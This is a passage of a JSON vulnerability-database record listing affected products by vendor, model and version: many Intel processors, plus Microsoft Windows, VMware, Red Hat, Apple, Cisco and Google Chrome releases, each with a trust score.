        "trust": 1.0,
        "vendor": "intel",
        "version": "6098p"
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2690_v2"
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4624l_v2"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "520m"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3320m"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4558u"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3427u"
      },
      {
        "model": "pentium j",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "j2850"
      },
      {
        "model": "xeon e3 1270 v5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "celeron j",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "j3160"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6260u"
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2660"
      },
      {
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "x5690"
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2698_v4"
      },
      {
        "model": "xeon e5 2450",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon e5 2438l v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4258u"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2330m"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4010u"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4570t"
      },
      {
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8850_v2"
      },
      {
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4850_v3"
      },
      {
        "model": "xeon phi",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "7230f"
      },
      {
        "model": "xeon e5 2630l v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4460"
      },
      {
        "model": "xeon e3 1265l v4",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon phi",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "7295"
      },
      {
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "x3460"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "7567u"
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4640_v2"
      },
      {
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "x3480"
      },
      {
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "w3690"
      },
      {
        "model": "atom x3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c3265rk"
      },
      {
        "model": "xeon e3 1280 v6",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "e5607"
      },
      {
        "model": "xeon e5 2623 v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2680_v4"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "940xm"
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4650_v3"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2340ue"
      },
      {
        "model": "xeon gold",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6134m"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5010u"
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4620_v2"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4300u"
      },
      {
        "model": "xeon e3 1220",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4100m"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4770"
      },
      {
        "model": "xeon gold",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6126f"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3550"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3610qe"
      },
      {
        "model": "xeon silver",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4112"
      },
      {
        "model": "xeon e3 1265l v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "atom z",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "z2480"
      },
      {
        "model": "atom z",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "z3735f"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2500s"
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2667"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3570t"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2670qm"
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2699_v3"
      },
      {
        "model": "xeon e3 1240l v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "atom c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c2550"
      },
      {
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "e5507"
      },
      {
        "model": "atom z",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "z3740d"
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4620_v3"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "660um"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4850hq"
      },
      {
        "model": "xeon e5 2603 v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2920xm"
      },
      {
        "model": "xeon e5 2609 v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon e3 1245 v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "atom c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c3830"
      },
      {
        "model": "atom z",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "z3735d"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3632qm"
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2658_v3"
      },
      {
        "model": "xeon phi",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "7285"
      },
      {
        "model": "xeon e5 2420 v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4570te"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6440eq"
      },
      {
        "model": "xeon e5 1630 v4",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8880_v3"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2500t"
      },
      {
        "model": "xeon e3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "1515m_v5"
      },
      {
        "model": "xeon gold",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6150"
      },
      {
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "lc5528"
      },
      {
        "model": "xeon e3 1220 v6",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon e5 2650 v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon e5 1620 v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "655k"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4370t"
      },
      {
        "model": "atom x3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c3230rk"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4200y"
      },
      {
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "l7545"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4440s"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4570"
      },
      {
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8893_v4"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4700eq"
      },
      {
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "x7550"
      },
      {
        "model": "atom c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c2558"
      },
      {
        "model": "xeon e3 1275 v5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon e5 2637",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon phi",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "7250f"
      },
      {
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2830"
      },
      {
        "model": "xeon e3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "1505m_v6"
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4610_v3"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3217u"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2365m"
      },
      {
        "model": "pentium n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "n3700"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "620m"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4770hq"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2370m"
      },
      {
        "model": "xeon e3 1246 v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4402ec"
      },
      {
        "model": "xeon gold",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6142f"
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4655_v3"
      },
      {
        "model": "atom z",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "z3745d"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "620ue"
      },
      {
        "model": "windows for 32-bit systems sp1",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "microsoft",
        "version": "7"
      },
      {
        "model": "windows for x64-based systems sp1",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "microsoft",
        "version": "7"
      },
      {
        "model": "edge",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "microsoft",
        "version": "0"
      },
      {
        "model": "internet explorer",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "microsoft",
        "version": "11"
      },
      {
        "model": "windows for x64-based systems",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "microsoft",
        "version": "8.10"
      },
      {
        "model": "windows for 32-bit systems",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "microsoft",
        "version": "8.10"
      },
      {
        "model": "windows version for x64-based systems",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "microsoft",
        "version": "1015110"
      },
      {
        "model": "windows version for 32-bit systems",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "microsoft",
        "version": "1015110"
      },
      {
        "model": "esxi",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "vmware",
        "version": "5.5"
      },
      {
        "model": "workstation",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "vmware",
        "version": "12.5.7"
      },
      {
        "model": "workstation",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "vmware",
        "version": "12.5.5"
      },
      {
        "model": "workstation",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "vmware",
        "version": "12.5.3"
      },
      {
        "model": "workstation",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "vmware",
        "version": "12.0"
      },
      {
        "model": "fusion",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "vmware",
        "version": "8.5.8"
      },
      {
        "model": "fusion",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "vmware",
        "version": "8.5.6"
      },
      {
        "model": "fusion",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "vmware",
        "version": "8.5.4"
      },
      {
        "model": "fusion",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "vmware",
        "version": "8.5.2"
      },
      {
        "model": "fusion",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "vmware",
        "version": "8.1.1"
      },
      {
        "model": "fusion",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "vmware",
        "version": "8.1"
      },
      {
        "model": "fusion",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "vmware",
        "version": "8.0.2"
      },
      {
        "model": "fusion",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "vmware",
        "version": "8.0.1"
      },
      {
        "model": "fusion",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "vmware",
        "version": "8.5.5"
      },
      {
        "model": "fusion",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "vmware",
        "version": "8.5"
      },
      {
        "model": "fusion",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "vmware",
        "version": "8.0"
      },
      {
        "model": "esxi",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "vmware",
        "version": "6.5"
      },
      {
        "model": "esxi",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "vmware",
        "version": "6.0"
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "amd",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "arm",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "apple",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "dell",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "dell emc",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "fortinet",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "hp",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "hitachi",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "ibm",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "intel",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "qualcomm incorporated",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "red hat",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "suse linux",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "synology",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "ubuntu",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "vmware",
        "version": null
      },
      {
        "model": "\uff08\u8907\u6570\u306e\u88fd\u54c1\uff09",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "\u8907\u6570\u306e\u30d9\u30f3\u30c0",
        "version": null
      },
      {
        "model": "\uff08\u8907\u6570\u306e\u88fd\u54c1\uff09",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "\u8907\u6570\u306e\u30d9\u30f3\u30c0",
        "version": "(multiple products)"
      },
      {
        "model": "\uff08\u8907\u6570\u306e\u88fd\u54c1\uff09",
        "scope": null,
        "trust": 0.8,
        "vendor": "\u8907\u6570\u306e\u30d9\u30f3\u30c0",
        "version": null
      },
      {
        "model": "hat enterprise linux desktop",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "red",
        "version": "6"
      },
      {
        "model": "windows server r2",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "microsoft",
        "version": "2008"
      },
      {
        "model": "hat enterprise linux",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "red",
        "version": "6"
      },
      {
        "model": "hat enterprise linux workstation",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "red",
        "version": "6"
      },
      {
        "model": "hat enterprise linux server",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "red",
        "version": "6"
      },
      {
        "model": "windows windows server",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "microsoft",
        "version": "2012"
      },
      {
        "model": "windows",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "microsoft",
        "version": "8.1"
      },
      {
        "model": null,
        "scope": "eq",
        "trust": 0.6,
        "vendor": "google",
        "version": "v8"
      },
      {
        "model": "windows server r2",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "microsoft",
        "version": "2012"
      },
      {
        "model": "windows server",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "microsoft",
        "version": "2016"
      },
      {
        "model": "windows for 32-bit systems",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "microsoft",
        "version": "10"
      },
      {
        "model": "windows for x64-based systems",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "microsoft",
        "version": "10"
      },
      {
        "model": "windows version for 32-bit systems",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "microsoft",
        "version": "101511"
      },
      {
        "model": "windows version for x64-based systems",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "microsoft",
        "version": "101511"
      },
      {
        "model": "windows version for 32-bit systems",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "microsoft",
        "version": "101607"
      },
      {
        "model": "windows version for x64-based systems",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "microsoft",
        "version": "101607"
      },
      {
        "model": "windows version for 32-bit systems",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "microsoft",
        "version": "101703"
      },
      {
        "model": "windows version for x64-based systems",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "microsoft",
        "version": "101703"
      },
      {
        "model": "hat enterprise linux workstation",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "red",
        "version": "7"
      },
      {
        "model": "hat enterprise linux server",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "red",
        "version": "7"
      },
      {
        "model": "hat enterprise linux desktop",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "red",
        "version": "7"
      },
      {
        "model": "tvos",
        "scope": "lt",
        "trust": 0.6,
        "vendor": "apple",
        "version": "11.2"
      },
      {
        "model": "ios",
        "scope": "lt",
        "trust": 0.6,
        "vendor": "apple",
        "version": "11.2"
      },
      {
        "model": "xeon cpu e5-1650",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "intel",
        "version": "v3"
      },
      {
        "model": "hat enterprise linux server tus",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "red",
        "version": "7.4"
      },
      {
        "model": "hat enterprise linux server tus",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "red",
        "version": "7.2"
      },
      {
        "model": "hat enterprise linux server tus",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "red",
        "version": "6.6"
      },
      {
        "model": "hat enterprise linux server aus",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "red",
        "version": "7.4"
      },
      {
        "model": "hat enterprise linux server aus",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "red",
        "version": "7.2"
      },
      {
        "model": "hat enterprise linux server aus",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "red",
        "version": "7.3"
      },
      {
        "model": "hat enterprise linux server aus",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "red",
        "version": "6.6"
      },
      {
        "model": "macos",
        "scope": "lt",
        "trust": 0.6,
        "vendor": "apple",
        "version": "10.13.2"
      },
      {
        "model": "cloud services platform",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "cisco",
        "version": "2100"
      },
      {
        "model": "vbond orchestrator",
        "scope": null,
        "trust": 0.6,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "vedge cloud",
        "scope": null,
        "trust": 0.6,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "vedge",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "cisco",
        "version": "5000"
      },
      {
        "model": "vedge",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "cisco",
        "version": "2000"
      },
      {
        "model": "vedge",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "cisco",
        "version": "100"
      },
      {
        "model": "vedge",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "cisco",
        "version": "1000"
      },
      {
        "model": "nexus 6p",
        "scope": null,
        "trust": 0.6,
        "vendor": "google",
        "version": null
      },
      {
        "model": "enterprise linux server year extended update support",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "redhat",
        "version": "-47.4"
      },
      {
        "model": "pixel xl",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "google",
        "version": "0"
      },
      {
        "model": "nexus",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "google",
        "version": "5x"
      },
      {
        "model": "pixel c",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "google",
        "version": "0"
      },
      {
        "model": "android",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "google",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1689.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.7"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.924.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1049.1"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "0.9.110.6"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375127"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.77"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.31"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.71"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.46"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.51"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.117"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.166"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.28"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.891.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.15"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.112"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.27"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.46"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.306.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1012"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1005.0"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "5"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "29.0.1547.42"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1039"
      },
      {
        "model": "enterprise linux server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "6"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.11"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.67"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.434.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.10"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.702.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1311.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.687.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.155"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.78"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.365.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "29.0.1547.12"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.879.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.74"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.317.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
